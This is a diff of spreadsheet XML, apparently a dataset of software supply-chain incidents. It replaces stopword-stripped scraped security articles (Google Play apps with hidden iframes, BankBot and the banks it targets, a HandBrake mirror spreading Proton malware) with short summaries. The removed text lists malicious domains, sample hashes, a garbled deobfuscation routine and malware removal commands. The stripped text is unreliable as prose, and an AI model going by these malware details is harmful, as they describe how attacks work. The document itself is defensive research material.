clearest pointer though developer’s certificate clearly states state indonesia figure infected samples’ connection indonesia common html files infected malicious iframes file infecting viruses like ramnit infecting windows host viruses search hard drive html files append iframes document developer infected viruses app’s html files could infected however given developers indonesia it’s also possible downloaded infected hosting website used infected online generation platform either case believe developers malicious victims attack pieces supporting evidences investigation samples share similarities coding structure suggesting generated platform malicious domains used resolve sinkholes developers attacks behind could replaced working domains cause real damage infected sample attempts download windows executable file suggests attacker know target platform clearly case developers potential damages mitigation currently infected apps cause damage android users however represent novel platforms “carrier” malware infected spread malware platforms without realizing similar xcodeghost attack identified shows attacking developers impact endusers it’s easy envision focused successful attack attacker could easily replace current malicious domains advertising urls generate revenue steals revenue developers also damages developers’ reputation secondly aggressive attackers could place malicious scripts remote server utilize javascriptinterface access infected apps’ native functionality vector resources within would available attackers control could also operate silently replace developer’s designated server result whatever information sent developer’s server falls hands attacker advanced attackers also directly modify app’s internal logic adding rooting utility declaring additional permissions dropping malicious file escalate capabilities wildfire customers automatically protected infected samples analysis engine inside wildfire capable identifying tiny hidden iframe also correlating embedded domains acknowledgements would like thank claud xiao palo alto networks assistance comments investigation greatly appreciate expedited response google team help verify take actions infected apps appendix malicious domains wwwbrenzplrc jlchuraplrc infected samples’ hashes package names additional samples available upon request blog comments c6e27882060463c287d1a184f8bc0e3201d5d58719ef13d9ab4a22a89400cf61 comaaronbalderappsawesome3dstreetart a49ac5a97a7bac7d437eed9edcf52a72212673a6c8dc7621be22c332a1a41268 comaaronbalderappsawesomecheesecakeideas 1d5878dce6d39d59d36645e806278396505348bddf602a8e3b1f74b0ce2bfbe8 comaaronbalderappsbabyroomdesignideas db95c87da09bdedb13430f28983b98038f190bfc0cb40f4076d8ee1c2d14dae6 comaaronbalderappsbackyardwoodprojects 28b16258244a23c82eff82ab0950578ebeb3a4947497b61e3b073b0f5f5e40ed comaaronbalderappsbathroominteriordesigns b330de625777726fc1d70bbd5667e4ce6eae124bde00b50577d6539bca9d4ae5 comaaronbalderappsbeautifulbotanicalgardens d6289fa1384fab121e730b1dce671f404950e4f930d636ae66ded0d8eb751678 comaaronbalderappsbedroomdesign5d updates palo alto networks sign receive latest news cyber intelligence research please enter email address please mark robot submitting form agree terms acknowledge privacy statement popular resources resource center blog communities tech docs unit sitemap legal notices privacy terms documents account manage subscriptions report vulnerability palo alto networks rights reserved</t>
+          <t>Palo Alto Networks discovered 132 Android apps on Google Play infected with tiny hidden IFrames that link to malicious domains in their local HTML pages, with the most popular one having more than 10,000 installs alone. Their investigation indicates that the developers of these infected apps are not to blame, but are more likely victims themselves. We believe it is most likely that the app developers development platforms were infected with malware that searches for HTML pages and injects malicious content at the end of the HTML pages it finds.   What all the apps have in common is that they employ Android WebView to display static HTML pages.</t>
         </is>
       </c>
       <c r="D40" t="inlineStr">
         <is>
           <t>https://unit42.paloaltonetworks.com/unit42-google-play-apps-infected-malicious-iframes/</t>
-        </is>
-      </c>
-      <c r="E40" t="inlineStr">
-        <is>
-          <t>['menu', 'tool', 'attack', 'google', 'play', 'app', 'malicious', 'iframe', 'people', 'share', 'unit', 'tag', 'iframe', 'mobile', 'mobile', 'network', 'operator', 'service', 'provider', 'research', 'post', 'available', 'app', 'google', 'play', 'tiny', 'iframe', 'malicious', 'domain', 'local', 'html', 'page', 'popular', 'alone', 'investigation', 'developer', 'app', 'likely', 'victim', 'likely', 'developer', 'development', 'platform', 'malware', 'html', 'page', 'malicious', 'content', 'html', 'page', 'case', 'situation', 'mobile', 'malware', 'development', 'platform', 'developer', 'awareness', 'finding', 'team', 'app', 'play', 'figure', 'subset', 'sample', 'google', 'play', 'app', 'app', 'idea', 'cheesecake', 'gardening', 'coffee', 'table', 'figure', 'app', 'common', 'employ', 'webview', 'display', 'static', 'html', 'page', 'first', 'glance', 'page', 'picture', 'text', 'deep', 'analysis', 'actual', 'html', 'code', 'tiny', 'iframe', 'link', 'malicious', 'domain', 'domain', 'time', 'investigation', 'fact', 'many', 'app', 'play', 'notable', 'notable', 'infected', 'page', 'download', 'malicious', 'executable', 'file', 'time', 'page', 'loading', 'device', 'window', 'behavior', 'nonandroid', 'category', 'classification', 'app', 'unable', 'harm', 'user', 'device', 'component', 'harmful', 'platform', 'infection', 'work', 'app', 'internet', 'permission', 'activity', 'interstitial', 'advertisement', 'main', 'latter', 'instantiate', 'webview', 'component', 'local', 'html', 'page', 'figure', 'webview', 'component', 'functionality', 'sample', 'javascript', 'code', 'access', 'app', 'native', 'functionality', 'figure', 'example', 'code', 'html', 'page', 'display', 'text', 'tiny', 'iframe', 'component', 'observed', 'technique', 'iframe', 'iframe', 'tiny', 'height', 'width', 'display', 'attribute', 'iframe', 'specification', 'none', 'detection', 'simple', 'string', 'matching', 'source', 'url', 'html', 'number', 'code', 'example', 'figure', 'conversion', 'figure', 'technique', 'sample', 'iframe', 'region', 'iframe', 'source', 'converge', 'domain', 'domain', 'sinkhole', 'server', 'user', 'figure', 'domain', 'malware', 'time', 'investigation', 'notorious', 'history', 'figure', 'malicious', 'domain', 'current', 'resolve', 'sinkhole', 'server', 'investigation', 'sample', 'infected', 'iframe', 'entire', 'figure', 'script', 'base64', 'window', 'executable', 'system', 'script', 'file', 'system', 'execute', 'proprietary', 'scripting', 'language', 'script', 'inert', 'execute', 'android', 'platform', 'piece', 'code', 'cause', 'damage', 'android', 'user', 'code', 'html', 'illegal', 'html', 'page', 'browser', 'much', 'order', 'html', 'page', 'difficult', 'people', 'standard', 'wildfire', 'several', 'malicious', 'behavior', 'file', 'network', 'host', 'window', 'firewall', 'setting', 'code', 'process', 'copy', 'figure', 'sample', 'attempt', 'window', 'executable', 'file', 'origin', 'infection', 'app', 'different', 'unrelated', 'developer', 'geographical', 'connection', 'different', 'developer', 'connection', 'straightforward', 'name', 'significant', 'number', 'sample', 'word', 'name', 'developer', 'website', 'personal', 'blog', 'page', 'indonesian', 'clear', 'pointer', 'developer', 'certificate', 'state', 'sample', 'connection', 'common', 'html', 'file', 'malicious', 'iframe', 'file', 'virus', 'window', 'host', 'virus', 'hard', 'drive', 'html', 'file', 'iframe', 'document', 'developer', 'virus', 'app', 'html', 'file', 'developer', 'possible', 'website', 'online', 'generation', 'platform', 'case', 'developer', 'malicious', 'victim', 'piece', 'evidence', 'investigation', 'sample', 'similarity', 'structure', 'platform', 'malicious', 'domain', 'sinkhole', 'developer', 'attack', 'working', 'domain', 'real', 'damage', 'sample', 'attempt', 'window', 'executable', 'file', 'attacker', 'target', 'platform', 'developer', 'potential', 'damage', 'mitigation', 'app', 'damage', 'android', 'user', 'novel', 'platform', 'carrier', 'malware', 'spread', 'malware', 'platform', 'similar', 'xcodeghost', 'attack', 'show', 'developer', 'impact', 'enduser', 'easy', 'envision', 'successful', 'attack', 'attacker', 'current', 'malicious', 'domain', 'advertising', 'url', 'revenue', 'revenue', 'developer', 'developer', 'reputation', 'aggressive', 'attacker', 'malicious', 'script', 'remote', 'server', 'access', 'app', 'native', 'functionality', 'vector', 'resource', 'available', 'attacker', 'control', 'developer', 'server', 'information', 'developer', 'server', 'hand', 'attacker', 'advanced', 'attacker', 'app', 'internal', 'logic', 'utility', 'additional', 'permission', 'malicious', 'file', 'escalate', 'capability', 'customer', 'infected', 'sample', 'analysis', 'engine', 'wildfire', 'capable', 'tiny', 'iframe', 'domain', 'acknowledgement', 'network', 'assistance', 'comment', 'investigation', 'response', 'team', 'take', 'action', 'app', 'malicious', 'domain', 'infected', 'sample', 'hash', 'package', 'name', 'additional', 'sample', 'available', 'request', 'blog', 'comment', 'comaaronbalderappsbabyroomdesignidea', 'db95c87da09bdedb13430f28983b98038f190bfc0cb40f4076d8ee1c2d14dae6', 'comaaronbalderappsbackyardwoodproject', 'comaaronbalderappsbathroominteriordesigns', 'b330de625777726fc1d70bbd5667e4ce6eae124bde00b50577d6539bca9d4ae5', 'update', 'network', 'sign', 'late', 'news', 'cyber', 'intelligence', 'research', 'email', 'address', 'mark', 'robot', 'form', 'term', 'privacy', 'statement', 'popular', 'resource', 'resource', 'center', 'blog', 'community', 'unit', 'sitemap', 'legal', 'notice', 'privacy', 'term', 'document', 'account', 'manage', 'subscription', 'report', 'vulnerability', 'network', 'right']</t>
         </is>
       </c>
     </row>
@@ -1490,17 +1330,12 @@
       </c>
       <c r="C41" t="inlineStr">
         <is>
-          <t>access denied dont permission access httpblogsvmwarecomsecurity201703secondaskpartnernetworkapncompromisehighlightsattackerscommandeeringwidelyusedgeneraltoolssophisticatedtargetedattackshtml server reference 1854cd94d11711593009280c8fbe httpserrorsedgesuitenet1854cd94d11711593009280c8fbe</t>
+          <t>Ask software was co-opted again by a malicious actor to execute malicious software on victim endpoints.</t>
         </is>
       </c>
       <c r="D41" t="inlineStr">
         <is>
           <t>https://www.carbonblack.com/blog/second-ask-partner-network-apn-compromise-highlights-attackers-commandeering-widely-used-general-tools-sophisticated-targeted-attacks/</t>
-        </is>
-      </c>
-      <c r="E41" t="inlineStr">
-        <is>
-          <t>['access', 'access', 'server', 'reference']</t>
         </is>
       </c>
     </row>
@@ -1517,17 +1352,12 @@
       </c>
       <c r="C42" t="inlineStr">
         <is>
-          <t>skip content solution partners resources news articles contact linkedin twitter jobs privacy intelpgp contact research banking malware google play targeting many apps april jump introduction casually browsing daily notifications koodous found banking malware google play many banking targets configuration sample flagged bankbot rules funny videos struck different usual bankbot samples since tagged using dexprotector tool heavily obfuscate apks addition name wasn’t usual popular name flash player coded google play update figured check looking names activities manifest items seemed like normal inserted malware read another sample malware recently inserted existing uploaded google play figured would check google play sure still surprise actually google play figure funny videos google play update longer available apparently updated recently april likely malware added reported reporting system time writing still available google play appear installs isn’t much normal quite malware least compared installation counts we’ve seen mobile banking malware figure additional google play info details known technique used anything interesting sample besides available google play coworkers eager look decided device captured traffic http11 server nginx date contenttype texthtml charsetutf8 connection close xpoweredby php5416 contentlength tagyy removed brevity kme1 looking data came server immediately noticed tagobfuscated datatag format earlier started searching code deobfuscate since dexprotector obfuscated takes time deobfuscate malware doesn’t update quickly decided recent bankbot sample wasn’t obfuscated heavily obtain deobfuscation routine ended using sample 7c2e913571dad579fc8fa3a03171cf523e86a0686e1ba14f277da33569410646 purpose since it’s recent march also privateinjlstphp request inside cleaned deobfuscation routine sample ended following code import javaneturldecoder public class deobfuscator public static string deobfuscatestring obfuscatedtext string result string “mkleotrghyua” whilei keylength obfuscatedtext obfuscatedtextreplacekeysubstringi string strarr obfuscatedtextsplit“ whilej strarrlength result result charintegerparseintstrarrj catchexception return urldecoderdecoderesult public static void mainstring args string obfuscated systemoutprintlndeobfuscatordeobfuscateobfuscated sample used comparison ended used google play sample lucky enough spend additional time figuring throwing obtained server data java code running program resulting deobfuscated data containing list apps targeted surprise list extensive expected first time contained dutch targets including rabobank regiobank binck full list found seeing customers target list decided update detection signatures also detect sample effort prevent online banking fraud guess game started nice quiet period reason believe functionality malware significantly different previous samples i’ll closer look update google decided take play store turns malware mostly phishing credit card details internet banking credentials screenshots phishing overlays seen image figure collection overlays targeted apps aibibankandroid aibibankandroidtablet arbapro arbaprotablet arcomredlinkciudad arcomsantanderriombanking armacro arnbademobileandroidmobilebank atbawagmbanking atbawagtablet ateasybankmbanking aterstebankgeorge atingdibaclientonlinebanking atoberbankmbanking atpsaappbawag atspardatnetbanking atvolksbankvolksbankmobile aucomampmyportfolioandroid aucombankwestmobile aucomheritageapp aucomingdirectandroid aucommacquariebanking aucommebankbanking aucomnabmobile aucomnabmobileandroidnabconnect aucompnbankandroid aucomsuncorpsuncorpbank bizmobinexandroidappscepsifrematik cedacrimobilebankasti cedacrimobilebankbppb cedacrimobilebankdesiobrianza chraiffeisenandroid chraiffeisenphototan couknationwidemobile comalinmasofttoken comboqsecure combankalbilad comcredemmobile comeurobankefg comingdirectandroid comqiib comsifrebazcep comvbsmartphoneapp coma2aandroidburgan comabnamrogrip comabnamronlmobilepayments comabnamronlmobilewallet comadcbbank comadibmbs comakbankandroidappsakbankdirekt comakbankandroidappsakbankdirekttablet comakbanksoftotp comalahlimobileandroid comalinmasmartphone comalphapass comamanalrajhi comanzandroidgomoney comappfactorytmb comarabbankarabimobile comaxabanquefr comaxiscbk combancamarchbancamovil combancomermbanking combancsabadellwallet combankaustriaandroidolb combankiawallet combankinterlauncher combankinterportugalbmb combankofirelandmobilebanking combankofqueenslandboq combankofqueenslandboqtablet combarclaysandroidbarclaysmobilebanking combarclaysbca combarclaysportugalui combawagpsksecurityapp combbvabbvacontigo combbvabbvawalletmx combbvanetcash combbvanetcashar combbvanxttablet combendigobankmobile combinckbankevolution combnppeasybanking comboitablet365 comboubyanappboubyanbank comboursoramaandroidclients combsffm combusinesstoken comcaisseepargneandroidtablette comcaisseepargneandroidmobilebanking comcajamargccajamar comcajasurandroid comcarrefourbank comcbaandroidnetbank comcbashiraz comcbdmobile comcbqcbmobile comcicprodbad comcicprodtabletbad comcitiregionalargentina comcitibankmobileau comcitibankmobilecitiuaepat comcleverlancecsasservis24 comcmprodbad comcmprodtabletbad comcomarchmobile comcomarchmobilebankingbnpparibas comcomarchsecuritymobilebanking comcomdirectphototan comcommbanknetbank comcommerzbankkontostand comcommerzbankphototan comcsvasco comcsgcsdnmb comdbmmdeutschebank comdbmobilebanking comdbpbcmiabanca comdbpbcmibanco comdbpbcphototandb comdbtabbanking comdefencebanklocationapp comdibapp comducontmeethaq comducontmuscatbank comentersektauthappdkb comezmcomsofttokenadcb comfinansbankmobilecepsube comfinanteqfinanceca comfirstdirectbankingonthego comfpecomptenickel comfullsixandroidlabanquepostaleaccountaccess comfusionbanking comfusionbeyondbank comgarantibonusapp comgaranticepbank comgaranticepsubesi comgetingroupmobilebanking comgieseckedevrientandroidwalletrabo comgoogleandroid1gm1 comgreatergreater comgrpplandroidshellbos comgrpplandroidshellcmblloydstsb73 comgrpplandroidshellhalifax comhipotecariomobile comhsbchsbcukcmb comhtsuhsbcpersonalbanking comicbcmobileabroadarg comicomvisionbscmobilebank comideaknowing comiecapitaloneuk comiflexfcatmobileandroid comimbbanking2 comingdibambbr2 comingdibasmartsecure2 comingmobile comingmobilepayments comingbanktrcuzdan comingbanktringmobil comintertechmobilemoneytransferactivity comisispapyrusraiffeisenpayeyewdg comkbcmobilebanking comkfhkfhonline comkutxabankandroid comkutxabankappatxas comkuveytturkmobil comlatuabancatabperandroid comlatuabancaperandroid comlatuabancaperandroidispb comlatuabancaperandroidpg comlclapplicationtablette comlloydsbankbusinessmobile commagiclickodeabank commbankingnbb commediaengineallianzbank commediolanumandroidbst commediolanumandroidfullbanca commediolanumandroidwallet commobileloftalphadroid commobilenikbsf commobilenikubikabna commonitiseclientandroidclydesdale commonitiseclientandroidyorkshire commonitisecoop commosyncappbancogalicia comnboar comnbomobs comncbsofttoken comnearformptsb comniobiumlabseurobankactivity comofssfcdbmobileandroidphonebahllauncher comopentechengandroidwebank compaypalandroidp2pmobile compaypalhere composteitalianepostemobilestore compozitronanb compozitroningkurumsal compozitroniscep compozitronvakifbank comrak comrbsmobileandroidnatwest comrbsmobileandroidnatwestbandc comrbsmobileandroidrbsbandc comrbsmobileandroidrbsm comrbsmobileandroidubn comrevmobilebankingwestpac comrsi comrsiruralviatablet coms4m comsabajaljazirasmart comsabb comsambamb comscbaebmw comscrignosa comsellabancasella comsofttechisbankasi comsolidpassmainbsf comstarfinanzmobileandroiddkbpushtan comstarfinanzmobileandroidpushtan comstarfinanzsmobandroidsbanking comstarfinanzsmobandroidsbankingtablet comstarfinanzsmobandroidsfinanzstatus comstarfinanzsmobandroidsfinanzstatustablet comsuperviellembanking comswmindvccandroidbzwbkmobileapp comtargoprodbad comtargoprodtabletbad comteb comtecnocomcajalaboral comtescobankmobile comtmobdenizbank comtmobtechhalkbank comubankinternetbanking comubsswidk2yandroid comubsswidkxjandroid comunicajatabletas comunicredit comvakifbankmobile comviperatsstarterfgb comviperatsstartermashreqae comviperatsstartermashreqqa comviperatsstarterqnb comykbandroid comykbandroiddb comykbandroidmobilonay comykbandroidtablet comykbavm comzentitying comziraatziraatmobil coopbancocredicoopbancamobile czairbankandroid czcsasappmujstav czcsasbusiness24 czcsobsmartbanking czcsobsmartklic czkbmbabusiness czmbank czmonetasmartbanka czrbappsmartphonebanking czsberbankcz czulikeitfio deadessomobileandroidgadfints decomdirect decomdirectandroid decommerzbankingmobil deconsorsbank dedkbportalapp dedzbankkartenregie defgimssecuresign defgimsvrsecurecard defiduciasmartphoneandroidbankingbb defiduciasmartphoneandroidbankingpsd defiduciasmartphoneandroidbankingvr defiduciasmartphoneandroidsecuregovr deingdibakontostand depostbankfinanzassistent desdvrzihbmobileapp desdvrzihbmobilesecureappnetbankproduktion desdvrzihbmobilesecureappspardaproduktion enbdmobilebanking enbdmobilebankingksamobile enbdmobilebankingsmartbusiness esbancopopularnbmpopular esbancopopularnbmpopulartablet esbancosantanderapps esbancosantanderempresas esbancosantanderwallet esbmnbmnapp2 esbmncajagranadaapp2 esbmncajamurciaapp2 esbmnsanostraapp2 escaixagaliciaactivamovil escaixageralcaixageralapp esccmccmapp escmandroid escmandroidtablet esconnectismobilealrajhi esevobancobancamovil eslacaixahceicon2 eslacaixamobileandroidnewwapicon esliberbankcajasturapp esredsyswalletmbappkutxapro esredsyswalletmbapplaboralkutxapro essantandermoney esuniviaunicajamovil eueleadermobilebankingabk eueleadermobilebankingbre eueleadermobilebankingnbk eueleadermobilebankingpekao eueleadermobilebankingpekaofirm eueleadermobilebankingraiffeisen euinmiteprjkbmobilbank finansbankenpara frbanquepopulairecyberplus frbanquepopulairecyberpluspro frbanquepopulairecyberplustablet frbredfr frcreditagricoleandroidapp frcreditagricolemacarteca frlclandroidcustomerarea frlclandroidentreprise ftbibankandroid grwinbankmobile hrassecoandroidjimbamucicz hrassecoandroidjimbamucicztablet hrassecoandroidmtokencredemcredemprod hrassecoandroidmtokenpekao itbcciccreamycartabcc itbnlandroidtablet itbnlappsbanking itbpmbpmandroid itbpmptbandroid itcarige itcividalebpconline itcopergmpsrtpfandroidspbmps itcopergmpsrtpfandroidtabuibmps itcrevalbancaperta itelfisystemsncbcdroidtablet itelfisystemsncbcmobile itgruppobperamsandroidbper itingdirectapp itnogoodcontainer itpopsoscrignoapp itrelaxbanking itreplyupmobileandroid itsecservizimobileatime itsecservizimobileatimebpaa itsecservizimobileatimebpvi itubidigitalcode itubissmpay itvolksbankandroid mbankingnbg mobisocietegeneralemobilelappli mobisocietegeneralemobilelapplipro mobilealphabankmyalphawalletandroid mobilesantanderde netatosalrajhimobilekw netbnpparibasmescomptes netinverlinebancosabadellofficelocatorandroid nlasnbankasnbankieren nlrabomobiel nlregiobankregiobankieren nlsnsbanksnsbankieren nlsnsbanksnshelp nzcoampmyportfolioandroid nzcoanzandroidmobilebanking nzcoasbasbmobile nzcoasbmobilebusiness nzcobnzdroidbanking nzcobnzdroidbusinessbanking nzcocooperativebank nzcokiwibankmobile nzcowestpac orgbanelco orgbanelcoibay orgbanelcoqlms orgbanelcorbts orgbanelcosdmr orgbankingbombusinessconnect orgbankingbsabusinessconnect orgbankingstgbusinessconnect orgbanksabank orgbombank orgmicroemuandroidmodelcommonvtuserapplicationlin orgmicroemuandroidmodelcommonvtuserapplicationlin orgstgeorgebank orgwestpacbank orgwestpaccol plaliorbankkantorwalutowy plbzwbkbzwbk24 plbzwbkibiznes24 plbzwbkmobiletabbzwbk24 plcomsuntechmobileconnect pleurobank plingingmobile plipkomobile plmbank plmillenniumcorpapp plpkobpiko posteitalianeposteappappbpol ptbancopopularandroidapp ptbancobestandroidmobilebanking ptbancobpimobileautorizacoesempresas ptbancobpimobilefiabilizacao ptbesbestablet ptcgdcaixadirecta ptcgdcaixadirectaempresas ptnovobanconbapp ptsantandertottamobileparticulares ptsibsandroidmbway riyadbankingappandroid rmbeleggen trcomsekerbilisimmbank tsbmobilebanking ukcobankofscotlandbusinessbank ukcometrobankonlinepersonalmobile ukconorthernbankandroidtribank ukcosantanderbusinessukbb ukcosantandersantanderuk ukcotsbmobilebank witandroidbcpbankingappactivobank witandroidbcpbankingappmillennium witandroidbcpbankingappmillenniumpl wwwingdirectnativeframe comandroidvendin demo trial contact jobs privacy intelpgp vulnerability disclosure</t>
+          <t>Another instance of the BankBot trojan was identified within an app on the Google Play Store.</t>
         </is>
       </c>
       <c r="D42" t="inlineStr">
         <is>
           <t>https://www.threatfabric.com/blogs/banking_malware_in_google_play_targeting_many_new_apps.html</t>
-        </is>
-      </c>
-      <c r="E42" t="inlineStr">
-        <is>
-          <t>['content', 'solution', 'partner', 'news', 'article', 'contact', 'linkedin', 'twitter', 'job', 'intelpgp', 'contact', 'research', 'banking', 'play', 'many', 'app', 'jump', 'introduction', 'daily', 'notification', 'koodous', 'banking', 'many', 'banking', 'target', 'configuration', 'sample', 'rule', 'funny', 'video', 'different', 'usual', 'bankbot', 'sample', 'dexprotector', 'tool', 'apks', 'addition', 'name', 'usual', 'popular', 'name', 'flash', 'player', 'play', 'update', 'figured', 'check', 'name', 'activity', 'item', 'normal', 'malware', 'sample', 'malware', 'play', 'play', 'sure', 'play', 'figure', 'funny', 'video', 'play', 'update', 'available', 'likely', 'reported', 'system', 'time', 'available', 'google', 'play', 'install', 'normal', 'malware', 'installation', 'count', 'mobile', 'banking', 'malware', 'additional', 'play', 'info', 'detail', 'technique', 'interesting', 'sample', 'available', 'play', 'coworker', 'eager', 'device', 'traffic', 'http11', 'contenttype', 'connection', 'close', 'brevity', 'datum', 'server', 'datatag', 'format', 'code', 'deobfuscate', 'dexprotector', 'time', 'recent', 'bankbot', 'sample', 'deobfuscation', 'routine', 'sample', 'purpose', 'recent', 'march', 'privateinjlstphp', 'request', 'deobfuscation', 'routine', 'sample', 'code', 'import', 'javaneturldecoder', 'public', 'class', 'deobfuscator', 'public', 'static', 'string', 'obfuscatedtext', 'string', 'result', 'string', 'mkleotrghyua', 'strarrlength', 'result', 'urldecoderdecoderesult', 'public', 'static', 'void', 'args', 'string', 'sample', 'comparison', 'play', 'sample', 'lucky', 'additional', 'time', 'server', 'datum', 'program', 'datum', 'list', 'app', 'surprise', 'list', 'extensive', 'first', 'time', 'dutch', 'target', 'binck', 'full', 'list', 'customer', 'target', 'list', 'update', 'detection', 'signature', 'sample', 'effort', 'online', 'banking', 'fraud', 'guess', 'game', 'nice', 'quiet', 'period', 'reason', 'functionality', 'different', 'previous', 'sample', 'update', 'play', 'store', 'credit', 'card', 'detail', 'internet', 'banking', 'credential', 'screenshot', 'overlay', 'image', 'figure', 'collection', 'overlay', 'app', 'arbaprotablet', 'atingdibaclientonlinebanking', 'atspardatnetbanking', 'aucomnabmobile', 'couknationwidemobile', 'comalinmasofttoken', 'comboqsecure', 'combankalbilad', 'comcredemmobile', 'comeurobankefg', 'comabnamrogrip', 'comabnamronlmobilepayment', 'combarclaysbca', 'combawagpsksecurityapp', 'combbvabbvacontigo', 'combbvabbvawalletmx', 'combbvanetcashar', 'combendigobankmobile', 'combinckbankevolution', 'comboursoramaandroidclient', 'combusinesstoken', 'comcmprodtabletbad', 'comfullsixandroidlabanquepostaleaccountaccess', 'comfusionbeyondbank', 'comgreatergreater', 'comhtsuhsbcpersonalbanking', 'comicbcmobileabroadarg', 'comrbsmobileandroidrbsm', 'comrbsmobileandroidubn', 'comrevmobilebankingwestpac', 'comrsiruralviatablet', 'comstarfinanzmobileandroiddkbpushtan', 'comtecnocomcajalaboral', 'comtescobankmobile', 'comubsswidk2yandroid', 'comubsswidkxjandroid', 'comunicredit', 'comviperatsstartermashreqqa', 'czcsasbusiness24', 'czcsobsmartklic', 'czkbmbabusiness', 'decomdirect', 'depostbankfinanzassistent', 'desdvrzihbmobileapp', 'desdvrzihbmobilesecureappnetbankproduktion', 'desdvrzihbmobilesecureappspardaproduktion', 'enbdmobilebankingksamobile', 'enbdmobilebankingsmartbusiness', 'escaixagaliciaactivamovil', 'ftbibankandroid', 'itgruppobperamsandroidbper', 'itingdirectapp', 'itnogoodcontainer', 'itpopsoscrignoapp', 'itreplyupmobileandroid', 'orgbanelcoqlm', 'orgbankingbombusinessconnect', 'plbzwbkbzwbk24', 'plbzwbkibiznes24', 'plbzwbkmobiletabbzwbk24', 'plcomsuntechmobileconnect', 'pleurobank', 'plingingmobile', 'plipkomobile', 'plmbank', 'plmillenniumcorpapp', 'plpkobpiko', 'posteitalianeposteappappbpol', 'ptcgdcaixadirecta', 'ptcgdcaixadirectaempresas', 'ptnovobanconbapp', 'ptsantandertottamobileparticulare', 'ukcobankofscotlandbusinessbank', 'ukcometrobankonlinepersonalmobile', 'witandroidbcpbankingappmillenniumpl', 'wwwingdirectnativeframe', 'comandroidvendin', 'demo', 'trial', 'contact', 'job', 'intelpgp', 'vulnerability', 'disclosure']</t>
         </is>
       </c>
     </row>
@@ -1544,17 +1374,12 @@
       </c>
       <c r="C43" t="inlineStr">
         <is>
-          <t>skip main content microsoft microsoft teams copilot windows surface xbox deals small business support microsoft office windows surface xbox deals support software windows apps onedrive outlook skype onenote microsoft teams microsoft edge devices computers shop xbox accessories mixed reality phones entertainment xbox game pass ultimate xbox live gold xbox games games windows digital games movies business microsoft azure microsoft dynamics microsoft microsoft industry data platform microsoft advertising licensing shop business developer visual studio windows server windows center docs microsoft rewards free downloads education store locations gift cards view sitemap search search microsoftcom cancel current useragent string appears automated process incorrect please click link united states english microsoft homepage whats surface laptop studio surface laptop surface surface laptop microsoft copilot copilot windows microsoft windows apps microsoft store account profile download center microsoft store support returns order tracking certified refurbished microsoft store promise flexible payments education microsoft education devices education microsoft teams education microsoft education school educator training development deals students parents azure students business microsoft cloud microsoft dynamics microsoft microsoft power platform microsoft teams copilot microsoft small business developer azure developer center documentation microsoft learn microsoft tech community azure marketplace appsource visual studio company careers microsoft company news privacy microsoft investors diversity inclusion accessibility sustainability english united states sitemap contact microsoft privacy terms trademarks safety recycling microsoft</t>
+          <t>The update for an editor tool was compromised. There are few specifics.</t>
         </is>
       </c>
       <c r="D43" t="inlineStr">
         <is>
           <t>https://www.microsoft.com/security/blog/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/</t>
-        </is>
-      </c>
-      <c r="E43" t="inlineStr">
-        <is>
-          <t>['main', 'content', 'small', 'business', 'support', 'deal', 'support', 'software', 'window', 'app', 'outlook', 'device', 'computer', 'accessory', 'mixed', 'reality', 'phone', 'game', 'game', 'digital', 'game', 'movie', 'platform', 'licensing', 'shop', 'business', 'developer', 'visual', 'studio', 'free', 'download', 'education', 'store', 'location', 'gift', 'card', 'sitemap', 'search', 'search', 'current', 'useragent', 'string', 'automated', 'process', 'incorrect', 'homepage', 'surface', 'laptop', 'studio', 'surface', 'laptop', 'surface', 'surface', 'copilot', 'app', 'store', 'account', 'profile', 'center', 'support', 'return', 'order', 'tracking', 'store', 'flexible', 'payment', 'education', 'device', 'school', 'educator', 'training', 'development', 'deal', 'student', 'parent', 'student', 'small', 'business', 'developer', 'azure', 'developer', 'center', 'documentation', 'azure', 'marketplace', 'appsource', 'visual', 'studio', 'company', 'news', 'privacy', 'inclusion', 'accessibility', 'sustainability', 'contact', 'term', 'safety']</t>
         </is>
       </c>
     </row>
@@ -1571,7 +1396,7 @@
       </c>
       <c r="C44" t="inlineStr">
         <is>
-          <t>handbrake open source video transcoder skip content search advanced search quick links unanswered topics active topics search rules contact login register board index main announcements search mirror download server compromised news updates locked print view search advanced search posts page handbrake moderator posts joined mirror download server compromised quote post handbrake warning anyone downloaded handbrake 02may2017 06may2017 needs verify sha1 file running anyone installed handbrake needs verify system infected trojan chance youve downloaded handbrake period detection process called activityagent activity monitor application infected reference youve installed handbrakedmg following checksums also infected sha1 0935a43ca90c6c419a49e4f8f1d75e68cd70b274 sha256 013623e5e50449bbdf6943549d8224a122aa6c42bd3300a1bd2b743b01ae6793 trojan question variant osxproton removal open terminal application following commands launchctl unload librarylaunchagentsfrhandbrakeactivityagentplist libraryrenderfilesactivityagentapp libraryvideoframeworks contains protonzip remove folder remove handbrakeapp installs actions required based information must also change passwords reside keychain browser password stores apple informed process update definitions osxs xprotect feature started morning start rolling machines automatically soon already summary handbrake107dmg replaced another unknown malicious file match sha1 sha256 hashes website github wiki mirrors httpsgithubcomhandbrakehandbrakewikichecksums affected download mirror downloadhandbrakefr shutdown investigation primary download mirror website unaffected downloads applications builtin updater later unaffected verified signature install dont pass downloads applications builtin updater earlier verification check system older releases relevant information becomes available update post notices download mirror server going completely rebuilt scratch downloads slower usual primary picks load time versions handbrake available handbrake moderator posts joined mirror download server compromised quote post handbrake misreported press times clarity handbrake team independent tranmission developers projects share history sense author created apps part current handbrake team developers share virtual machines transmission project handbrake moderator posts joined mirror download server compromised quote post handbrake analysis proton come light httpsobjectiveseecomblogblog0x1fhtml patrick objectiveseecom wrote well makes analysis rather easy going walk thru lets cover interesting items list first items list malware extracts utilizes following paths libraryextensionslittlesnitchkext libraryextensionsradio silencekext libraryextensionshandsoffkext paths checks exist disk malware immediately exits course macos products firewalls would alert user presence malware attempts call connect command control servers seems like malware would simply exit rather risking detection could various users infected handbrake application infected turns running little snitch lucky locked print view display posts days weeks month months months year sort author post time subject direction ascending descending posts page return “announcements” jump main announcements questions community support windows devices presets command line interface scripting general questions github submit feature request documentation miscellaneous tiki benchmarks development bugs feature requests board index times delete cookies policies contact powered phpbb forum software phpbb limited privacy terms</t>
+          <t>HandBrake-1.0.7.dmg was replaced by another unknown malicious file that DOES NOT match the SHA1 / SHA256 hashes for the legitimate version of the application (to install a new variant of the Proton malware)</t>
         </is>
       </c>
       <c r="D44" t="inlineStr">
@@ -1580,11 +1405,6 @@
 https://blog.malwarebytes.com/threat-analysis/mac-threat-analysis/2017/05/handbrake-hacked-to-drop-new-variant-of-proton-malware/</t>
         </is>
       </c>
-      <c r="E44" t="inlineStr">
